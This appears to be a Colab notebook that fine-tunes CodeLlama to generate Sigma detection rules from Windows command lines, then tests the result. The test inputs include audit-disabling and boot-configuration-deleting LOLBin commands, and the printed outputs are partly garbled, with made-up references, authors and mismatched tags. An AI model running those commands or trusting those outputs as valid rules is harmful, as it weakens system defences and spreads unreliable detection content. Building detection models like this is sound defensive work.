# STEP 1:

In [1]:
!pip install transformers accelerate peft bitsandbytes datasets torch

   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 72.9/72.9 MB 12.9 MB/s eta 0:00:00
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 363.4/363.4 MB 2.8 MB/s eta 0:00:00
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 13.8/13.8 MB 118.8 MB/s eta 0:00:00
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 24.6/24.6 MB 90.9 MB/s eta 0:00:00
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 883.7/883.7 kB 56.3 MB/s eta 0:00:00
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 664.8/664.8 MB 2.3 MB/s eta 0:00:00
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 211.5/211.5 MB 5.6 MB/s eta 0:00:00
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 56.3/56.3 MB 13.5 MB/s eta 0:00:00
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 127.9/127.9 MB 7.9 MB/s eta 0:00:00
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 207.5/207.5 MB 5.7 MB/s eta 0:00:00
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 21.1/21.1 MB 99.4 MB/s eta 0:00:00
  Attempting uninstall: nvidia-nvjitlink-cu12
    Found existing installation: nvidia-nvjitlink-cu12 12.5.82
    Uninstalli

In [6]:
from huggingface_hub import notebook_login
notebook_login()

# STEP 2:

In [7]:
import torch
from datasets import load_dataset, Dataset
from peft import LoraConfig, get_peft_model, TaskType, PeftModel, prepare_model_for_kbit_training
from transformers import (
    AutoModelForCausalLM,
    AutoTokenizer,
    BitsAndBytesConfig,
    TrainingArguments,
    Trainer,
    DataCollatorForLanguageModeling
)
import os
import json

def load_jsonl_dataset(file_path):
    """Load JSONL file manually and create Dataset"""
    data = []
    with open(file_path, 'r', encoding='utf-8') as f:
        for line in f:
            if line.strip():  # Skip empty lines
                data.append(json.loads(line.strip()))
    return Dataset.from_list(data)

def format_training_data(examples):
    """Format data thành dạng phù hợp cho training"""
    texts = []
    for i in range(len(examples["instruction"])):
        instruction = examples["instruction"][i]
        input_text = examples["input"][i] if examples["input"][i] else ""
        output_text = examples["output"][i]

        # Tạo prompt theo format instruction-following
        if input_text:
            text = f"<s>[INST] {instruction}\n\nInput: {input_text} [/INST] {output_text}</s>"
        else:
            text = f"<s>[INST] {instruction} [/INST] {output_text}</s>"
        texts.append(text)
    return {"text": texts}

def tokenize_function(examples, tokenizer, max_length=256):
    """Tokenize dữ liệu with proper padding and truncation"""
    # Tokenize with consistent padding
    tokenized = tokenizer(
        examples["text"],
        truncation=True,
        padding="max_length",
        max_length=max_length,
        return_tensors=None,
    )

    # Create labels (copy from input_ids)
    tokenized["labels"] = []
    for input_ids in tokenized["input_ids"]:
        if isinstance(input_ids, torch.Tensor):
            input_ids = input_ids.tolist()
        tokenized["labels"].append(input_ids.copy())

    return tokenized

In [8]:
def finetune_codellama():
    import torch, gc, json, random
    from datasets import Dataset
    from transformers import (
        AutoTokenizer, AutoModelForCausalLM, BitsAndBytesConfig,
        DataCollatorForLanguageModeling, Trainer, TrainingArguments
    )
    from peft import (
        LoraConfig, get_peft_model, prepare_model_for_kbit_training, TaskType
    )

    print("[+] Start fine-tuning CodeLLaMA...")

    # Clear GPU cache
    torch.cuda.empty_cache()
    gc.collect()

    # --- 1. Load & split dataset ---
    print("[-] Loading and splitting dataset...")

    # 🔷 Thay đường dẫn file gốc tại đây
    original_path = "/content/codeLLamA_detected_commands_fullrule.jsonl"

    with open(original_path, "r", encoding="utf-8") as f:
        all_data = [json.loads(line) for line in f]

    random.seed(42)
    random.shuffle(all_data)

    split_idx = int(0.93 * len(all_data))
    train_data = all_data[:split_idx]
    test_data = all_data[split_idx:]

    # Save train & test
    with open("/content/train_data.jsonl", "w", encoding="utf-8") as f:
        for d in train_data:
            f.write(json.dumps(d) + "\n")

    with open("/content/test_data.jsonl", "w", encoding="utf-8") as f:
        for d in test_data:
            f.write(json.dumps(d) + "\n")

    print(f"[+] Split: {len(train_data)} train / {len(test_data)} test")

    # --- 2. Load train set as Dataset ---
    data = Dataset.from_list(train_data)
    print(f"[+] Loaded {len(data)} training examples")

    # --- 3. Tokenizer ---
    print("[-] Loading tokenizer...")
    tokenizer = AutoTokenizer.from_pretrained("codellama/CodeLlama-7b-hf")
    tokenizer.pad_token = tokenizer.eos_token
    tokenizer.padding_side = "right"

    # --- 4. Format & tokenize ---
    print("[-] Formatting & tokenizing...")
    data = data.map(
        format_training_data,
        batched=True,
        remove_columns=data.column_names
    )

    data = data.map(
        lambda x: tokenize_function(x, tokenizer),
        batched=True,
        remove_columns=data.column_names
    )

    # --- 5. Load model ---
    print("[-] Loading model...")
    bnb_config = BitsAndBytesConfig(
        load_in_4bit=True,
        bnb_4bit_quant_type="nf4",
        bnb_4bit_compute_dtype=torch.float16,
        bnb_4bit_use_double_quant=True,
        bnb_4bit_quant_storage=torch.uint8
    )

    model = AutoModelForCausalLM.from_pretrained(
        "codellama/CodeLlama-7b-hf",
        quantization_config=bnb_config,
        device_map="auto",
        trust_remote_code=True,
        torch_dtype=torch.float16,
        low_cpu_mem_usage=True,
    )

    model = prepare_model_for_kbit_training(model)

    model.config.use_cache = False
    model.config.pretraining_tp = 1
    model.gradient_checkpointing_enable()
    model.enable_input_require_grads()

    # --- 6. Setup LoRA ---
    print("[-] Setting up LoRA...")
    peft_config = LoraConfig(
        task_type=TaskType.CAUSAL_LM,
        inference_mode=False,
        r=8,
        lora_alpha=16,
        lora_dropout=0.1,
        target_modules=["q_proj", "v_proj"],
        bias="none",
        use_rslora=False,
    )

    model = get_peft_model(model, peft_config)
    model.print_trainable_parameters()

    total_trainable = sum(p.numel() for p in model.parameters() if p.requires_grad)
    total_params = sum(p.numel() for p in model.parameters())
    print(f"[+] Trainable: {total_trainable:,} / {total_params:,} ({100*total_trainable/total_params:.2f}%)")

    # --- 7. Training arguments ---
    print("[-] Setting up Trainer...")
    training_args = TrainingArguments(
        output_dir="./codeLLamA_detected_commands_finetune",
        per_device_train_batch_size=1,
        gradient_accumulation_steps=8,
        learning_rate=5e-4,
        num_train_epochs=1,
        max_steps=200,
        logging_steps=10,
        save_strategy="steps",
        save_steps=250,
        save_total_limit=1,
        fp16=True,
        optim="paged_adamw_8bit",
        lr_scheduler_type="linear",
        warmup_steps=25,
        group_by_length=True,
        dataloader_drop_last=True,
        report_to=None,
        push_to_hub=False,
        dataloader_num_workers=0,
        remove_unused_columns=True,
        eval_strategy="no",
        prediction_loss_only=True,
        dataloader_pin_memory=False,
        skip_memory_metrics=True,
    )

    # --- 8. Data collator ---
    data_collator = DataCollatorForLanguageModeling(
        tokenizer=tokenizer,
        mlm=False,
        pad_to_multiple_of=8,
        return_tensors="pt"
    )

    # --- 9. Trainer ---
    trainer = Trainer(
        model=model,
        args=training_args,
        train_dataset=data,
        data_collator=data_collator,
        tokenizer=tokenizer,
    )

    # --- 10. Train ---
    print("[-] Starting training...")
    trainer.train()

    # --- 11. Save model ---
    print("[-] Saving model...")
    trainer.save_model()
    trainer.push_to_hub()
    print("[+] Training completed!")

    print("[+] Test set saved at /content/test_data.jsonl")
    return trainer



In [9]:
# Run
trainer = finetune_codellama()

[+] Start fine-tuning CodeLLaMA...
[-] Loading and splitting dataset...
[+] Split: 1859 train / 140 test
[+] Loaded 1859 training examples
[-] Loading tokenizer...


/usr/local/lib/python3.11/dist-packages/huggingface_hub/utils/_auth.py:94: UserWarning: 
The secret `HF_TOKEN` does not exist in your Colab secrets.
To authenticate with the Hugging Face Hub, create a token in your settings tab (https://huggingface.co/settings/tokens), set it as secret in your Google Colab and restart your session.
You will be able to reuse this secret in all of your notebooks.
Please note that authentication is recommended but still optional to access public models or datasets.
  warnings.warn(


tokenizer_config.json:   0%|          | 0.00/749 [00:00<?, ?B/s]

tokenizer.model:   0%|          | 0.00/500k [00:00<?, ?B/s]

tokenizer.json: 0.00B [00:00, ?B/s]

...

adapter_model.safetensors:   0%|          | 0.00/16.8M [00:00<?, ?B/s]

Upload 3 LFS files:   0%|          | 0/3 [00:00<?, ?it/s]

training_args.bin:   0%|          | 0.00/5.37k [00:00<?, ?B/s]

events.out.tfevents.1751995106.e256e5164468.423.0:   0%|          | 0.00/10.1k [00:00<?, ?B/s]

[+] Training completed!
[+] Test set saved at /content/test_data.jsonl


In [ ]:
from google.colab import drive
drive.mount('/content/drive')

MessageError: Error: credential propagation was unsuccessful

## Create folder

In [10]:
import os
# os.makedirs("/content/drive/MyDrive/finetune_lora", exist_ok=True)
os.makedirs("/content/finetune_lora", exist_ok=True)

In [ ]:
# !cp -r /content/drive/MyDrive/finetune_lora/codellama-custom-finetuned /content/codellama-custom-finetuned
# !cp -r /content/drive/MyDrive/finetune_lora/merged_model_fp16 /content/merged_model_fp16

In [ ]:
# # Lưu adapter (LoRA weights)
# trainer.model.save_pretrained("/content/drive/MyDrive/finetune_lora/adapter")

🔤 Loading tokenizer...


('/content/drive/MyDrive/finetune_lora/tokenizer/tokenizer_config.json',
 '/content/drive/MyDrive/finetune_lora/tokenizer/special_tokens_map.json',
 '/content/drive/MyDrive/finetune_lora/tokenizer/tokenizer.model',
 '/content/drive/MyDrive/finetune_lora/tokenizer/added_tokens.json',
 '/content/drive/MyDrive/finetune_lora/tokenizer/tokenizer.json')

In [ ]:
# Lưu tokenizer
# print("🔤 Loading tokenizer...")
# tokenizer = AutoTokenizer.from_pretrained("codellama/CodeLlama-7b-hf")
# tokenizer.pad_token = tokenizer.eos_token
# tokenizer.padding_side = "right"
# tokenizer.save_pretrained("/content/drive/MyDrive/finetune_lora/merged_model_fp16")

🔤 Loading tokenizer...


/usr/local/lib/python3.11/dist-packages/huggingface_hub/utils/_auth.py:94: UserWarning: 
The secret `HF_TOKEN` does not exist in your Colab secrets.
To authenticate with the Hugging Face Hub, create a token in your settings tab (https://huggingface.co/settings/tokens), set it as secret in your Google Colab and restart your session.
You will be able to reuse this secret in all of your notebooks.
Please note that authentication is recommended but still optional to access public models or datasets.
  warnings.warn(


tokenizer_config.json:   0%|          | 0.00/749 [00:00<?, ?B/s]

tokenizer.model:   0%|          | 0.00/500k [00:00<?, ?B/s]

tokenizer.json:   0%|          | 0.00/1.84M [00:00<?, ?B/s]

special_tokens_map.json:   0%|          | 0.00/411 [00:00<?, ?B/s]

('/content/drive/MyDrive/finetune_lora/merged_model_fp16/tokenizer_config.json',
 '/content/drive/MyDrive/finetune_lora/merged_model_fp16/special_tokens_map.json',
 '/content/drive/MyDrive/finetune_lora/merged_model_fp16/tokenizer.model',
 '/content/drive/MyDrive/finetune_lora/merged_model_fp16/added_tokens.json',
 '/content/drive/MyDrive/finetune_lora/merged_model_fp16/tokenizer.json')

# STEP 3:

In [ ]:
!cp -r /content/codeLLamA_detected_commands_finetune /content/drive/MyDrive/finetune_lora/codeLLamA_detected_commands_finetune
# Replace with your model's name #########################

In [1]:
from transformers import AutoTokenizer, AutoModelForCausalLM
from peft import PeftModel
import torch

base_model_id = "codellama/CodeLlama-7b-hf"

# Replace with your model's name #########################
# lora_model_path = "/content/drive/MyDrive/finetune_lora/codeLLamA_detected_commands_finetune" ##
lora_model_path = "/content/codeLLamA_detected_commands_finetune"
##########################################################

# merged_model_path = "/content/drive/MyDrive/finetune_lora/merged_model_fp16"
merged_model_path = "/content/finetune_lora/merged_model_fp16"

# Load base model
base_model = AutoModelForCausalLM.from_pretrained(
    base_model_id,
    device_map="auto",
    torch_dtype=torch.float16,
    trust_remote_code=True,
)

# Merge LoRA into base model
lora_model = PeftModel.from_pretrained(
    base_model,
    lora_model_path,
    torch_dtype=torch.float16,
)

merged_model = lora_model.merge_and_unload()
merged_model.save_pretrained(merged_model_path)

/usr/local/lib/python3.11/dist-packages/huggingface_hub/utils/_auth.py:94: UserWarning: 
The secret `HF_TOKEN` does not exist in your Colab secrets.
To authenticate with the Hugging Face Hub, create a token in your settings tab (https://huggingface.co/settings/tokens), set it as secret in your Google Colab and restart your session.
You will be able to reuse this secret in all of your notebooks.
Please note that authentication is recommended but still optional to access public models or datasets.
  warnings.warn(


Loading checkpoint shards:   0%|          | 0/2 [00:00<?, ?it/s]

In [ ]:
!cp -r /content/merged_model_fp16 /content/drive/MyDrive/finetune_lora/merged_model_fp16

In [1]:
from transformers import AutoTokenizer, AutoModelForCausalLM, pipeline
import torch

# model_path = "/content/drive/MyDrive/finetune_lora/merged_model_fp16"
model_path = "/content/finetune_lora/merged_model_fp16"

tokenizer = AutoTokenizer.from_pretrained("codellama/CodeLlama-7b-hf")
tokenizer.pad_token = tokenizer.eos_token
tokenizer.padding_side = "right"
# tokenizer.save_pretrained("/content/drive/MyDrive/finetune_lora/merged_model_fp16")
tokenizer.save_pretrained("/content/finetune_lora/merged_model_fp16")

# Load tokenizer
tokenizer = AutoTokenizer.from_pretrained(model_path)

# Load model
model = AutoModelForCausalLM.from_pretrained(model_path, device_map="auto", torch_dtype=torch.float16)

# Create pipeline
pipe = pipeline("text-generation", model=model, tokenizer=tokenizer)

/usr/local/lib/python3.11/dist-packages/huggingface_hub/utils/_auth.py:94: UserWarning: 
The secret `HF_TOKEN` does not exist in your Colab secrets.
To authenticate with the Hugging Face Hub, create a token in your settings tab (https://huggingface.co/settings/tokens), set it as secret in your Google Colab and restart your session.
You will be able to reuse this secret in all of your notebooks.
Please note that authentication is recommended but still optional to access public models or datasets.
  warnings.warn(


Loading checkpoint shards:   0%|          | 0/3 [00:00<?, ?it/s]

Device set to use cuda:0


In [2]:
from tqdm import tqdm
import json

# Load test set
with open("/content/test_data.jsonl", "r", encoding="utf-8") as f:
    test_data = [json.loads(line) for line in f]

# Prompt format giữ nguyên như khi training
def build_prompt(command: str) -> str:
    return f"""### Instruction:
Write Sigma rule to detect payload:

### Input:
{command}

### Response:
"""

results = []

for example in tqdm(test_data, desc="[-] Testing on test set"):
    command = example["input"]
    expected = example["output"]

    prompt = build_prompt(command)

    try:
        # Generate full output
        gen_output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=1.0, top_p=0.9)[0]["generated_text"]
    except Exception as e:
        gen_output = f"[ERROR] {str(e)}"

    results.append({
        "input": command,
        "output_expected": expected,
        "output_model": gen_output
    })

# Save to JSONL
with open("/content/model_test_results.jsonl", "w", encoding="utf-8") as f:
    for r in results:
        f.write(json.dumps(r, ensure_ascii=False) + "\n")

print("\n[+] Testing done, results saved in model_test_results.jsonl")

[-] Testing on test set: 100%|██████████| 140/140 [2:48:48<00:00, 72.34s/it]


[+] Testing done, results saved in model_test_results.jsonl


In [ ]:
!pip install llama-cpp-python
!pip install huggingface_hub
!git clone https://github.com/ggerganov/llama.cpp.git

     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 49.8/49.8 MB 16.1 MB/s eta 0:00:00
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Installing backend dependencies ... done
  Preparing metadata (pyproject.toml) ... done
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 45.5/45.5 kB 4.3 MB/s eta 0:00:00
  Created wheel for llama-cpp-python: filename=llama_cpp_python-0.3.12-cp311-cp311-linux_x86_64.whl size=4220756 sha256=045d5d4acdb601862b316ce75811e61c6e2a8bcb2bc4b7c30e1fc69cf88bb357
  Stored in directory: /root/.cache/pip/wheels/7d/b8/30/8988efe892bf4e389f95fa946371363596b28a47091f12494c
Successfully built llama-cpp-python
Cloning into 'llama.cpp'...
remote: Enumerating objects: 55680, done.
remote: Counting objects: 100% (9/9), done.
remote: Compressing objects: 100% (9/9), done.
remote: Total 55680 (delta 1), reused 0 (delta 0), pack-reused 55671 (from 2)
Receiving objects: 100% (55680/55680), 132.47 MiB | 31.23 MiB/s, done.
Resolving deltas: 100% (4

In [ ]:
!cd llama.cpp && mkdir build
!cd llama.cpp/build && cmake .. && make -j$(nproc)

-- The C compiler identification is GNU 11.4.0
-- The CXX compiler identification is GNU 11.4.0
-- Detecting C compiler ABI info
-- Detecting C compiler ABI info - done
-- Check for working C compiler: /usr/bin/cc - skipped
-- Detecting C compile features
-- Detecting C compile features - done
-- Detecting CXX compiler ABI info
-- Detecting CXX compiler ABI info - done
-- Check for working CXX compiler: /usr/bin/c++ - skipped
-- Detecting CXX compile features
-- Detecting CXX compile features - done
-- Found Git: /usr/bin/git (found version "2.34.1")
-- Performing Test CMAKE_HAVE_LIBC_PTHREAD
-- Performing Test CMAKE_HAVE_LIBC_PTHREAD - Success
-- Found Threads: TRUE
-- Warning: ccache not found - consider installing it for faster compilation or disable this warning with GGML_CCACHE=OFF
-- CMAKE_SYSTEM_PROCESSOR: x86_64
-- GGML_SYSTEM_ARCH: x86
-- Including CPU backend
-- Found OpenMP_C: -fopenmp (found version "4.5")
-- Found OpenMP_CXX: -fopenmp (found version "4.5")
-- Found OpenMP:

In [ ]:
from transformers import AutoTokenizer
from huggingface_hub import HfApi, create_repo
import subprocess
import os

# Đường dẫn model đã merge
merged_model_path = "/content/merged_model_fp16"
base_model_id = "codellama/CodeLlama-7b-hf"

# Bước 2: Load và save tokenizer
print("Saving tokenizer...")
tokenizer = AutoTokenizer.from_pretrained(base_model_id)
tokenizer.save_pretrained(merged_model_path)

# Bước 3: Convert sang GGUF
print("Converting to GGUF format...")
gguf_output_path = "/content/merged_model.gguf"

# Sử dụng script convert từ llama.cpp
convert_script = "/content/llama.cpp/convert_hf_to_gguf.py"
convert_command = [
    "python", convert_script,
    merged_model_path,
    "--outfile", gguf_output_path,
    "--outtype", "f16"  # hoặc "q8_0", "q4_0" để quantize
]

try:
    result = subprocess.run(convert_command, capture_output=True, text=True, check=True)
    print("Conversion successful!")
    print(result.stdout)
except subprocess.CalledProcessError as e:
    print(f"Conversion failed: {e}")
    print(f"Error output: {e.stderr}")

# Bước 4: Upload lên Hugging Face
def upload_to_huggingface(gguf_file_path, repo_name, hf_token):
    # Tạo API instance
    api = HfApi(token=hf_token)

    # Tạo repository (nếu chưa có)
    try:
        create_repo(repo_name, token=hf_token, exist_ok=True)
        print(f"Repository {repo_name} created/confirmed")
    except Exception as e:
        print(f"Error creating repo: {e}")
        return

    # Upload file GGUF
    try:
        api.upload_file(
            path_or_fileobj=gguf_file_path,
            path_in_repo="model.gguf",
            repo_id=repo_name,
            token=hf_token
        )
        print(f"Successfully uploaded to https://huggingface.co/{repo_name}")
    except Exception as e:
        print(f"Upload failed: {e}")

Saving tokenizer...


/usr/local/lib/python3.11/dist-packages/huggingface_hub/utils/_auth.py:94: UserWarning: 
The secret `HF_TOKEN` does not exist in your Colab secrets.
To authenticate with the Hugging Face Hub, create a token in your settings tab (https://huggingface.co/settings/tokens), set it as secret in your Google Colab and restart your session.
You will be able to reuse this secret in all of your notebooks.
Please note that authentication is recommended but still optional to access public models or datasets.
  warnings.warn(


tokenizer_config.json:   0%|          | 0.00/749 [00:00<?, ?B/s]

tokenizer.model:   0%|          | 0.00/500k [00:00<?, ?B/s]

tokenizer.json:   0%|          | 0.00/1.84M [00:00<?, ?B/s]

special_tokens_map.json:   0%|          | 0.00/411 [00:00<?, ?B/s]

Converting to GGUF format...
Conversion successful!



# STEP 4:

In [ ]:
if __name__ == "__main__":
    # Cấu hình
    HF_TOKEN = "your-token"  # Thay thế bằng token của bạn

    # Change to your data repo's name. ###########
    # Example: hira-wz/codellama-custom-rules-gguf
    REPO_NAME = "hira-wz/codellama-custom-gguf" ##
    ##############################################

    # Upload GGUF file
    if os.path.exists(gguf_output_path):
        upload_to_huggingface(gguf_output_path, REPO_NAME, HF_TOKEN)
    else:
        print("GGUF file not found. Please check the conversion step.")

Repository hira-wz/codellama-custom-gguf created/confirmed


merged_model.gguf:   0%|          | 0.00/13.5G [00:00<?, ?B/s]

Successfully uploaded to https://huggingface.co/hira-wz/codellama-custom-gguf


# Inference

In [ ]:
!pip install transformers accelerate bitsandbytes peft

In [ ]:
from transformers import AutoTokenizer, AutoModelForCausalLM, pipeline
import torch

model_path = "/content/drive/MyDrive/finetune_lora/merged_model_fp16"

tokenizer = AutoTokenizer.from_pretrained("codellama/CodeLlama-7b-hf")
tokenizer.pad_token = tokenizer.eos_token
tokenizer.padding_side = "right"
tokenizer.save_pretrained("/content/drive/MyDrive/finetune_lora/merged_model_fp16")

# Load tokenizer
tokenizer = AutoTokenizer.from_pretrained(model_path)

# Load model
model = AutoModelForCausalLM.from_pretrained(model_path, device_map="auto", torch_dtype=torch.float16)

# Tạo pipeline để dễ dùng
pipe = pipeline("text-generation", model=model, tokenizer=tokenizer)

# Prompt mới
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\AccCheckConsole.exe AccCheckConsole.exe -hwnd -process -window

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

/usr/local/lib/python3.11/dist-packages/huggingface_hub/utils/_auth.py:94: UserWarning: 
The secret `HF_TOKEN` does not exist in your Colab secrets.
To authenticate with the Hugging Face Hub, create a token in your settings tab (https://huggingface.co/settings/tokens), set it as secret in your Google Colab and restart your session.
You will be able to reuse this secret in all of your notebooks.
Please note that authentication is recommended but still optional to access public models or datasets.
  warnings.warn(


Loading checkpoint shards:   0%|          | 0/3 [00:00<?, ?it/s]

Device set to use cuda:0


### Instruction:
Write Sigma rule to detect payload:

### Input:
\AccCheckConsole.exe AccCheckConsole.exe -hwnd -process -window

### Response:
download: https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d0f6f0533052d6f8f77f8f6092e87e7/atomics/T1056/T1056.md
references:
    - https://www.trendmicro.com/en_us/research/23/e/acccheck-an-acroread-tool-for-auditing-embedded-files-and-streams.html
    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Acccheck/
    - https://twitter.com/pabraeken/status/1360457525895147521
author: frack113
status: test
date: 2021-02-28
modified: 2023-11-22
tags:
    - attack.discovery
    - attack.t1056.001
    - attack.t1021.001
    - attack.credential-access
    - attack.t1003.002
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '\AccCheckConsole.exe'
        CommandLine|contains:
            - 'AccCheckConsole.exe -hwnd'
            - 'AccCheckConsole.exe -proc

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
adplus.exe Adplus.exe -hang -pn -pmn -p -po -c -sc

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
adplus.exe Adplus.exe -hang -pn -pmn -p -po -c -sc

### Response:
Notify: New Adplus Hang Analysis Session Started
id: 9522b85b-6829-421e-a33e-36808701058f
status: test
description: Detects Adplus hanging session creation
references:
    - https://www.youtube.com/watch?v=Qo77fNQq6Qg
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-04-27
tags:
    - attack.defense-evasion
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '\adplus.exe'
        OriginalFileName: 'Adplus.exe'
    condition: selection
falsepositives:
    - Rare cases
level: medium











































































































































































































































































































In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
AgentExecutor.exe -powershell -remediationScript \\Microsoft.Management.Services.IntuneWindowsAgent.exe

###  Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
AgentExecutor.exe -powershell -remediationScript \Microsoft.Management.Services.IntuneWindowsAgent.exe

###  Response:
IrqlForCallerLevel 0x18
IrqlForCalleeLevel 0x16
SE_SYSTEM_PROFILE
SE_INCREASE_QUOTA
BUILTIN\PerformanceLogs users: (Standard_Access)
BUILTIN\PerformanceMonitor users: (Standard_Access)
BUILTIN\EventLog users: (Standard_Access)
BUILTIN\EventSystem users: (Standard_Access)
BUILTIN\RemoteDesktopUsers users: (Standard_Access)
BUILTIN\IIS_IUSRS users: (Standard_Access)

script: Get-RemoteAccessCredential
type: call


id: 2205593e-7b09-11eb-adc1-0242ac120002
related:
    - id: 2e07a262-7b09-11eb-adc1-0242ac120002
      type: similar
status: test
description: Detects suspicious privilege escalation using the User Assist registry key
references:
    - https://twitter.com/bohops/status/1542184791816426240
author: bohops (nextron.io)
date: 2021-11-05
modified: 2022-10-09
tags:
    - attack.execution
    - attack.pe

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\AtBroker.exe AtBroker.exe start animations audiodescription caretbrowsing caretwidth colorfiltering cursorindicator cursorscheme filterkeys focusborderheight focusborderwidth highcontrast keyboardcues keyboardpref livecaptions magnifierpane messageduration minimumhitradius mousekeys Narrator osk overlappedcontent showsounds soundsentry speechreco stickykeys togglekeys voiceaccess windowarranging windowtracking windowtrackingtimeout windowtrackingzorder Oracle_JavaAccessBridge

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\AtBroker.exe AtBroker.exe start animations audiodescription caretbrowsing caretwidth colorfiltering cursorindicator cursorscheme filterkeys focusborderheight focusborderwidth highcontrast keyboardcues keyboardpref livecaptions magnifierpane messageduration minimumhitradius mousekeys Narrator osk overlappedcontent showsounds soundsentry speechreco stickykeys togglekeys voiceaccess windowarranging windowtracking windowtrackingtimeout windowtrackingzorder Oracle_JavaAccessBridge

### Response:
For each executable or dll flagged as malware we could find using Virustotal, we could find the corresponding sigma rule in order to detect the malware.

### Note:
For each flagged malware found we could find the corresponding sigma rule which could be used to detect it


## Atomic Tests

- Atomic Test #1 - Suspicious Child Processes
Locates suspicious child processes created by a parent process using the command line utility "Process

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\at.exe interactive

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\at.exe interactive

### Response:
Simply run the scheduled script from the scheduled task in the past or future:
Input: \at.exe -interactive
id: 152384dd-354c-4c64-a480-406890557e1f
status: test
description: |
    An adversary may use the "at" command to schedule the execution of a batch script or binary file at a time, date, or interval that is convenient for the adversary.
    Malicious files can be scheduled to execute at specific times, or repeatedly at regularly scheduled intervals.
    The "at" command can be chained with other commands in order to hide the invocation of the program (for example, "at" commands can be embedded in other batch scripts that are scheduled to execute at a specific time).
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da25f73091c46b00566009346e26186afb/atomics/T1153.001/T1153.001.md
author: frack113
date: 2021-11-26
modified: 2023-02-04
tags:
    - attack.exec

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
/logon:none /system:none /sam:none /privilege:none /object:none /process:none /policy:none

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
/logon:none /system:none /sam:none /privilege:none /object:none /process:none /policy:none

### Response:
Give Me Admin!

id: 334d33d2b8b231a2838c601628b93e1c
related:
    - id: 820a0828-e261-40f3-b8fb-2023c7ffa563
      type: similar
status: test
description: Detects suspicious logon command-line flags that turn off UAC.
references:
    - https://twitter.com/nasbench/status/1464031827107798787
    - https://www.bleepingcomputer.com/news/security/uncommon-logon-flags-prompt-uac-bypass-to-privileged-command-shell/
    - https://www.zdnet.com/article/microsoft-windows-logon-flags-used-to-bypass-security-measures/
    - https://www.zdnet.com/article/microsoft-windows-logon-flags-used-to-bypass-security-measures/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-05-12
tags:
    - attack.privilege-escalation
    - attack.t1548
    - car.2016-03-001
logsource:
    category: process_creation
    product: windows
detec

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\auditpol.exe AUDITPOL.EXE disable clear remove restore

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\auditpol.exe AUDITPOL.EXE disable clear remove restore

### Response:
[{'command':'auditpol.exe AUDITPOL.EXE disable clear remove restore','created_by':'johndoe','created_at':'2020-10-21','description':'Detection of audit policy disable/restore/remove/clear






































































































































































































































































































































































































































































































































































































































































































In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\bcdedit.exe bcdedit.exe delete deletevalue import safeboot network

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\bcdedit.exe bcdedit.exe delete deletevalue import safeboot network

### Response:
Potential Uninstallation of Windows Updates or Drivers

Based on the IOCs provided in this rule, it checks if \bcdedit.exe is invoked with any of the listed commands. If it is invoked with any of the commands listed in the IOCs, it is flagged as suspicious.


---


### Configuration:

Pretty straight forward.

* Set the name of the IOC you want to detect in the name field
* Add the IOC you want to detect to the list of IOCs in the "iocs" field

---


